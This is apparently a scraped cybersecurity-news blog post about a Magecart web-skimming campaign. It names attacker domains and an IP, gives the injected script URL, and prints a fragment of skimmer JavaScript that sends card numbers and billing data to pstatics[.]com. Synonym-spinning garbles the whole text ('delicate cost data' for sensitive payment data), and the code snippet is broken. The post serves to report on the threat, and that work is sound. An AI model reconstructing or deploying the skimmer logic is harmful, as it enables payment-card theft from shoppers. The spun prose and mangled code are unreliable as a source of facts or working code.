Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data

Posted on September 17, 2025September 17, 2025 By CWS

The risk panorama for e-commerce web sites has as soon as once more shifted with the emergence of a complicated Magecart-style assault marketing campaign, characterised by the deployment of obfuscated JavaScript to reap delicate cost data.

The marketing campaign first got here to gentle in mid-September 2025 following a tweet indicating an ongoing skimming operation, which was later investigated intimately by cybersecurity researcher, Himanshu Anand.

This new episode demonstrates the persistent ingenuity of internet skimming teams leveraging client-side injection to focus on unsuspecting monetary transactions at scale.

The assault vectors in query contain the injection of malicious JavaScript, hosted on attacker-controlled domains comparable to cc-analytics[.]com, into susceptible checkout pages of compromised e-commerce platforms.

As soon as inserted, the script seamlessly blends into reliable cost workflows, hooking into type fields and occasion listeners to silently exfiltrate cost knowledge.

The preliminary code noticed was closely obfuscated, designed each to evade detection by safety scanners and to frustrate evaluation by incident responders.

Whereas the code has been reused throughout a number of campaigns, with the malware logic replicated below completely different domains comparable to getnjs[.]com, getvjs[.]com, and utilanalytics[.]com, primarily hosted on infrastructure like IP deal with 45.61.136.141.

Internet hosting IP extracted from URLScan transaction logs (Supply – Himanshu Anand)

Cybersecurity researcher, Himanshu Anand, famous the malware’s capability to leverage passive DNS and infrastructure fingerprinting to broaden its operational attain.

By analyzing public telemetry from sources like URLScan and WHOIS data, Anand was capable of map out a constellation of associated domains linked to a single cluster of attacker infrastructure.

These pivots revealed greater than a dozen lively domains, some masquerading as reliable analytics or utility providers, every serving equivalent or near-identical skimmer payloads.

The Malware’s An infection Mechanism

Central to the success of this Magecart operation is its an infection mechanism: a extremely automated skimmer script injected by way of [script src = “https://cybersecuritynews.com/new-magecart-skimmer-attack/https[:]//www[.]cc-analytics[.]com/app[.]js”].

As soon as lively, the code establishes occasion hooks on cost enter fields, comparable to bank card numbers and billing addresses. When triggered, the script collects stolen credentials and promptly dispatches them to a distant server (pstatics[.]com) utilizing XMLHttpRequest and FormData objects.

The core knowledge exfiltration logic will be described as follows:-

perform sendStolenData (“knowledge“`
const xhr”“`”new XMLHttp”“`uest ();
xhr“`en (‘POST’, ‘“`ps[:]//www.pstatics.com/i“`
const type“`a = “new Type”“`a ();
type“`a[.]append (‘uid’, “knowledge“`rdNumber”);
rmData[.]appendid’, knowledge[.]billingo);
xhr[.]ship”rmData”); }

The design ensures that solely legitimate, non-test credentials—these assembly sure size standards—are transmitted, maximizing the standard and worth of stolen knowledge.

This an infection pathway is additional bolstered by persistent infrastructure, with attackers recycling area patterns over time.

Free stay webinar on new malware ways from our analysts! Study superior detection methods -> Register for Free

Cyber Security News Tags:Attack, Data, Injection, JavaScript, Magecart, Malicious, Payment, Skim, Skimmer

Post navigation

Previous Post: TA558 Uses AI-Generated Scripts to Deploy Venom RAT in Brazil Hotel Attacks
Next Post: MuddyWater Hackers Using Custom Malware With Multi-Stage Payloads and Uses Cloudflare to Mask Fingerprints

Related Posts

Lazarus Hackers Weaponized 234 Packages Across npm and PyPI to Infect Developers Cyber Security News
Bragg Confirms Cyber Attack – Hackers Accessed Internal IT Systems Cyber Security News
New Android Spyware Disguised as an Antivirus Attacking Business Executives Cyber Security News
PoC Exploits for CitrixBleed2 Flaw Released – Attackers Can Exfiltrate 127 Bytes Per Request Cyber Security News
11 Best Cloud Access Security Broker Software (CASB) Cyber Security News
Crypto Developers Attacked With Malicious npm Packages to Steal Login Details Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • MuddyWater Hackers Using Custom Malware With Multi-Stage Payloads and Uses Cloudflare to Mask Fingerprints
  • New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data
  • TA558 Uses AI-Generated Scripts to Deploy Venom RAT in Brazil Hotel Attacks
  • 224 Malicious Android Apps on Google Play With 38 Million Downloads Delivering Malicious Payloads
  • Agentless Access, Sensitive Data Masking, and Smooth Session Playback

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • MuddyWater Hackers Using Custom Malware With Multi-Stage Payloads and Uses Cloudflare to Mask Fingerprints
  • New Magecart Skimmer Attack With Malicious JavaScript Injection to Skim Payment Data
  • TA558 Uses AI-Generated Scripts to Deploy Venom RAT in Brazil Hotel Attacks
  • 224 Malicious Android Apps on Google Play With 38 Million Downloads Delivering Malicious Payloads
  • Agentless Access, Sensitive Data Masking, and Smooth Session Playback

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News